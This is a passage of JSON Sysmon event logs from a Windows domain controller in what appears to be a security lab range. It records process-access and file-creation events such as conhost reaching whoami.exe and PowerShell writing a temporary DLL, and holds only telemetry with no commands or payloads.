06:55:18.416","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5638,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.416\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.416","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5639,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.416\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.416","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5640,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.416\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.416","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5641,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.416\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.416","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5642,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.416\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.416","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5643,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.416\r\nSourceProcessGUID: {E2A3D6B1-11D4-5F25-0000-00100D0C0800}\r\nSourceProcessId: 796\r\nSourceThreadId: 2504\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D6-5F25-0000-0010E54C0800}\r\nTargetProcessId: 4624\r\nTargetImage: C:\\Windows\\system32\\whoami.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.416","SourceProcessGUID":"{E2A3D6B1-11D4-5F25-0000-00100D0C0800}","SourceProcessId":"796","SourceThreadId":"2504","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11D6-5F25-0000-0010E54C0800}","TargetProcessId":"4624","TargetImage":"C:\\Windows\\system32\\whoami.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5644,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.525\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.525","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5645,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:55:18.588\r\nProcessGuid: {E2A3D6B1-11D6-5F25-0000-00106A320800}\r\nProcessId: 4848\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\pgch3ubf\\pgch3ubf.dll\r\nCreationUtcTime: 2020-08-01 06:55:18.588","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:55:18.588","ProcessGuid":"{E2A3D6B1-11D6-5F25-0000-00106A320800}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\pgch3ubf\\pgch3ubf.dll","CreationUtcTime":"2020-08-01 06:55:18.588","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5646,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.588\r\nProcessGuid: {E2A3D6B1-11D6-5F25-0000-00106A320800}\r\nProcessId: 4848\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\pgch3ubf\\pgch3ubf.cmdline\r\nCreationUtcTime: 2020-08-01 06:55:18.588","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 